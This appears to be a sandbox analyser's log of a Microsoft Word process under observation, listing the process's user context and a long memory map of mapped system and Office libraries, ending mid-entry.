# Flog Txt Version 1 # Analyzer Version: 2.1.0 # Analyzer Build Date: Jul 17 2017 18:00:02 # Log Creation Date: 18.07.2017 13:48:58.755 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe" page_root = "0x748d5000" os_pid = "0x974" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"" cur_dir = "C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e539" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 133 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 134 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 135 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 136 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 137 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 138 start_va = 0x60000 end_va = 0x63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 139 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 140 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 141 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 142 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 143 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 144 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 145 start_va = 0x100000 end_va = 0x166fff entry_point = 0x100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 146 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 147 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 148 start_va = 0x190000 end_va = 0x191fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 149 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 150 start_va = 0x1b0000 end_va = 0x1b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 151 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 152 start_va = 0x1d0000 end_va = 0x1d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 153 start_va = 0x1e0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 154 start_va = 0x1f0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 155 start_va = 0x200000 end_va = 0x202fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 156 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 157 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 158 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 159 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 160 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 161 start_va = 0x450000 end_va = 0x451fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 162 start_va = 0x460000 end_va = 0x461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 163 start_va = 0x470000 end_va = 0x481fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 164 start_va = 0x490000 end_va = 0x4a1fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 165 start_va = 0x4b0000 end_va = 0x4befff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 166 start_va = 0x4c0000 end_va = 0x4c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 167 start_va = 0x4d0000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 168 start_va = 0x550000 end_va = 0x62efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 169 start_va = 0x630000 end_va = 0x630fff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 170 start_va = 0x640000 end_va = 0x643fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 171 start_va = 0x650000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 172 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 173 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 174 start_va = 0x6b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 175 start_va = 0x6c0000 end_va = 0x6c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 176 start_va = 0x6d0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 177 start_va = 0x7d0000 end_va = 0x957fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 178 start_va = 0x960000 end_va = 0x960fff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 179 start_va = 0x970000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 180 start_va = 0x980000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 181 start_va = 0x990000 end_va = 0xb10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 182 start_va = 0xb20000 end_va = 0xdeefff entry_point = 0xb20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 183 start_va = 0xdf0000 end_va = 0xe0dfff entry_point = 0xdf0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 184 start_va = 0xe10000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 185 start_va = 0xe50000 end_va = 0x1028fff entry_point = 0xe51000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe") Region: id = 186 start_va = 0x1030000 end_va = 0x242ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 187 start_va = 0x2430000 end_va = 0x2822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 188 start_va = 0x2830000 end_va = 0x35e1fff entry_point = 0x2831000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 189 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x35f0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 190 start_va = 0x3600000 end_va = 0x363ffff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 191 start_va = 0x3640000 end_va = 0x367ffff entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 192 start_va = 0x3680000 end_va = 0x377ffff entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 193 start_va = 0x3780000 end_va = 0x383ffff entry_point = 0x3780000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 194 start_va = 0x3840000 end_va = 0x3841fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003840000" filename = "" Region: id = 195 start_va = 0x3850000 end_va = 0x3860fff entry_point = 0x3850000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 196 start_va = 0x3870000 end_va = 0x396ffff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 197 start_va = 0x3970000 end_va = 0x3a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 198 start_va = 0x3aa0000 end_va = 0x3adffff entry_point = 0x0 region_type = private name = "private_0x0000000003aa0000" filename = "" Region: id = 199 start_va = 0x3af0000 end_va = 0x3b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 200 start_va = 0x3b40000 end_va = 0x3b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 201 start_va = 0x3b80000 end_va = 0x3b9efff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 202 start_va = 0x3ba0000 end_va = 0x3bdffff entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 203 start_va = 0x3be0000 end_va = 0x3c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 204 start_va = 0x3c20000 end_va = 0x3c3efff entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 205 start_va = 0x3c40000 end_va = 0x3c40fff entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 206 start_va = 0x3c50000 end_va = 0x3c6efff entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 207 start_va = 0x3c70000 end_va = 0x3c90fff entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 208 start_va = 0x3cb0000 end_va = 0x3ceffff entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 209 start_va = 0x3d10000 end_va = 0x3d10fff entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 210 start_va = 0x3d20000 end_va = 0x3d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d20000" filename = "" Region: id = 211 start_va = 0x3da0000 end_va = 0x3ddffff entry_point = 0x0 region_type = private name = "private_0x0000000003da0000" filename = "" Region: id = 212 start_va = 0x3de0000 end_va = 0x3dfefff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 213 start_va = 0x3e10000 end_va = 0x3e10fff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 214 start_va = 0x3e30000 end_va = 0x3e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 215 start_va = 0x3e70000 end_va = 0x3e70fff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 216 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 217 start_va = 0x3eb0000 end_va = 0x3faffff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 218 start_va = 0x3fb0000 end_va = 0x3fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 219 start_va = 0x3fc0000 end_va = 0x3ffffff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 220 start_va = 0x4000000 end_va = 0x401efff entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 221 start_va = 0x4020000 end_va = 0x4020fff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 222 start_va = 0x4040000 end_va = 0x407ffff entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 223 start_va = 0x4080000 end_va = 0x40bffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 224 start_va = 0x40c0000 end_va = 0x40defff entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 225 start_va = 0x40f0000 end_va = 0x41effff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 226 start_va = 0x4210000 end_va = 0x430ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 227 start_va = 0x4310000 end_va = 0x472bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004310000" filename = "" Region: id = 228 start_va = 0x4730000 end_va = 0x482ffff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 229 start_va = 0x4860000 end_va = 0x4860fff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 230 start_va = 0x4870000 end_va = 0x519ffff entry_point = 0x4870000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 231 start_va = 0x51b0000 end_va = 0x51effff entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 232 start_va = 0x5200000 end_va = 0x52fffff entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 233 start_va = 0x5300000 end_va = 0x533ffff entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 234 start_va = 0x5340000 end_va = 0x534ffff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 235 start_va = 0x5380000 end_va = 0x547ffff entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 236 start_va = 0x54a0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 237 start_va = 0x54e0000 end_va = 0x5527fff entry_point = 0x0 region_type = private name = "private_0x00000000054e0000" filename = "" Region: id = 238 start_va = 0x5530000 end_va = 0x556ffff entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 239 start_va = 0x5580000 end_va = 0x55bffff entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 240 start_va = 0x55c0000 end_va = 0x5607fff entry_point = 0x0 region_type = private name = "private_0x00000000055c0000" filename = "" Region: id = 241 start_va = 0x5610000 end_va = 0x561ffff entry_point = 0x0 region_type = private name = "private_0x0000000005610000" filename = "" Region: id = 242 start_va = 0x5620000 end_va = 0x569efff entry_point = 0x5620000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 243 start_va = 0x56d0000 end_va = 0x56dffff entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 244 start_va = 0x5730000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005730000" filename = "" Region: id = 245 start_va = 0x5770000 end_va = 0x5f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 246 start_va = 0x5f90000 end_va = 0x5fcffff entry_point = 0x0 region_type = private name = "private_0x0000000005f90000" filename = "" Region: id = 247 start_va = 0x5fd0000 end_va = 0x60cffff entry_point = 0x0 region_type = private name = "private_0x0000000005fd0000" filename = "" Region: id = 248 start_va = 0x60d0000 end_va = 0x62cffff entry_point = 0x0 region_type = private name = "private_0x00000000060d0000" filename = "" Region: id = 249 start_va = 0x6300000 end_va = 0x633ffff entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 250 start_va = 0x6350000 end_va = 0x638ffff entry_point = 0x0 region_type = private name = "private_0x0000000006350000" filename = "" Region: id = 251 start_va = 0x63a0000 end_va = 0x63affff entry_point = 0x0 region_type = private name = "private_0x00000000063a0000" filename = "" Region: id = 252 start_va = 0x63f0000 end_va = 0x642ffff entry_point = 0x0 region_type = private name = "private_0x00000000063f0000" filename = "" Region: id = 253 start_va = 0x6430000 end_va = 0x652ffff entry_point = 0x0 region_type = private name = "private_0x0000000006430000" filename = "" Region: id = 254 start_va = 0x65f0000 end_va = 0x66effff entry_point = 0x0 region_type = private name = "private_0x00000000065f0000" filename = "" Region: id = 255 start_va = 0x6770000 end_va = 0x686ffff entry_point = 0x0 region_type = private name = "private_0x0000000006770000" filename = "" Region: id = 256 start_va = 0x6870000 end_va = 0x6c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006870000" filename = "" Region: id = 257 start_va = 0x6d30000 end_va = 0x6d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d30000" filename = "" Region: id = 258 start_va = 0x6e10000 end_va = 0x6e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e10000" filename = "" Region: id = 259 start_va = 0x6e90000 end_va = 0x6f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e90000" filename = "" Region: id = 260 start_va = 0x6fd0000 end_va = 0x700ffff entry_point = 0x0 region_type = private name = "private_0x0000000006fd0000" filename = "" Region: id = 261 start_va = 0x7010000 end_va = 0x740ffff entry_point = 0x0 region_type = private name = "private_0x0000000007010000" filename = "" Region: id = 262 start_va = 0x7410000 end_va = 0x780ffff entry_point = 0x0 region_type = private name = "private_0x0000000007410000" filename = "" Region: id = 263 start_va = 0x7810000 end_va = 0x7c10fff entry_point = 0x0 region_type = private name = "private_0x0000000007810000" filename = "" Region: id = 264 start_va = 0x7c20000 end_va = 0x8020fff entry_point = 0x0 region_type = private name = "private_0x0000000007c20000" filename = "" Region: id = 265 start_va = 0x8030000 end_va = 0x8430fff entry_point = 0x0 region_type = private name = "private_0x0000000008030000" filename = "" Region: id = 266 start_va = 0x8440000 end_va = 0x863ffff entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 267 start_va = 0x8640000 end_va = 0x8e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000008640000" filename = "" Region: id = 268 start_va = 0x8e40000 end_va = 0x92fffff entry_point = 0x0 region_type = private name = "private_0x0000000008e40000" filename = "" Region: id = 269 start_va = 0x9300000 end_va = 0x96fffff entry_point = 0x0 region_type = private name = "private_0x0000000009300000" filename = "" Region: id = 270 start_va = 0x9700000 end_va = 0x97fffff entry_point = 0x0 region_type = private name = "private_0x0000000009700000" filename = "" Region: id = 271 start_va = 0x9830000 end_va = 0x992ffff entry_point = 0x0 region_type = private name = "private_0x0000000009830000" filename = "" Region: id = 272 start_va = 0x9940000 end_va = 0x9a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000009940000" filename = "" Region: id = 273 start_va = 0x9a40000 end_va = 0x9b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 274 start_va = 0x9b80000 end_va = 0x9c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000009b80000" filename = "" Region: id = 275 start_va = 0x9c80000 end_va = 0x9d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 276 start_va = 0x9ec0000 end_va = 0x9fbffff entry_point = 0x0 region_type = private name = "private_0x0000000009ec0000" filename = "" Region: id = 277 start_va = 0x9fe0000 end_va = 0xa0dffff entry_point = 0x0 region_type = private name = "private_0x0000000009fe0000" filename = "" Region: id = 278 start_va = 0xa140000 end_va = 0xa23ffff entry_point = 0x0 region_type = private name = "private_0x000000000a140000" filename = "" Region: id = 279 start_va = 0xa240000 end_va = 0xa3f8fff entry_point = 0xa240000 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 280 start_va = 0x35c80000 end_va = 0x35c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000035c80000" filename = "" Region: id = 281 start_va = 0x67370000 end_va = 0x6737afff entry_point = 0x67371200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 282 start_va = 0x67380000 end_va = 0x67398fff entry_point = 0x67381319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 283 start_va = 0x673a0000 end_va = 0x6740ffff entry_point = 0x673a1f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 284 start_va = 0x67410000 end_va = 0x67440fff entry_point = 0x6741a8b6 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\SysWOW64\\EhStorShell.dll" (normalized: "c:\\windows\\syswow64\\ehstorshell.dll") Region: id = 285 start_va = 0x67450000 end_va = 0x67ccdfff entry_point = 0x67450000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 286 start_va = 0x67cd0000 end_va = 0x67d0cfff entry_point = 0x67cd10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 287 start_va = 0x67d10000 end_va = 0x67d26fff entry_point = 0x67d135fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 288 start_va = 0x67d40000 end_va = 0x67eb2fff entry_point = 0x67d41000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 289 start_va = 0x67ec0000 end_va = 0x67ed6fff entry_point = 0x67ecd36d region_type = mapped_file name = "msohev.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msohev.dll") Region: id = 290 start_va = 0x67ee0000 end_va = 0x67f2efff entry_point = 0x67ee1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 291 start_va = 0x67f30000 end_va = 0x67f87fff entry_point = 0x67f313b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 292 start_va = 0x67f90000 end_va = 0x67fa4fff entry_point = 0x67f911fa region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 293 start_va = 0x67fb0000 end_va = 0x67fb6fff entry_point = 0x67fb1120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 294 start_va = 0x67fc0000 end_va = 0x67fd9fff entry_point = 0x67fc2bfe region_type = mapped_file name = "loggingplatform.dll" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120_2\\LoggingPlatform.dll" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120_2\\loggingplatform.dll") Region: id = 295 start_va = 0x67fe0000 end_va = 0x68057fff entry_point = 0x67ff1ac0 region_type = mapped_file name = "telemetry.dll" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120_2\\Telemetry.dll" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120_2\\telemetry.dll") Region: id = 296 start_va = 0x68060000 end_va = 0x68131fff entry_point = 0x6806ee84 region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120_2\\msvcr110.dll" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120_2\\msvcr110.dll") Region: id = 297 start_va = 0x68140000 end_va = 0x681c4fff entry_point = 0x6817a901 region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120_2\\msvcp110.dll" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120_2\\msvcp110.dll") Region: id = 298 start_va = 0x681d0000 end_va = 0x6821ffff entry_point = 0x681d6277 region_type = mapped_file name = "filesyncshell.dll" filename = "\\Users\\hJrD1KOKY DS8lUjv\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120_2\\FileSyncShell.dll" (normalized: "c:\\users\\hjrd1koky ds8lujv\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120_2\\filesyncshell.dll") Region: id = 299 start_va = 0x68220000 end_va = 0x6826bfff entry_point = 0x68222c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 300 start_va = 0x68270000 end_va = 0x68287fff entry_point = 0x68271335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 301 start_va = 0x68290000 end_va = 0x68325fff entry_point = 0x682af8b9 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 302 start_va = 0x68330000 end_va = 0x6833efff entry_point = 0x683321a0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 303 start_va = 0x68340000 end_va = 0x68b34fff entry_point = 0x683a5279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\chart.dll") Region: id = 304 start_va = 0x68b40000 end_va = 0x68b9bfff entry_point = 0x68b62b48 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" 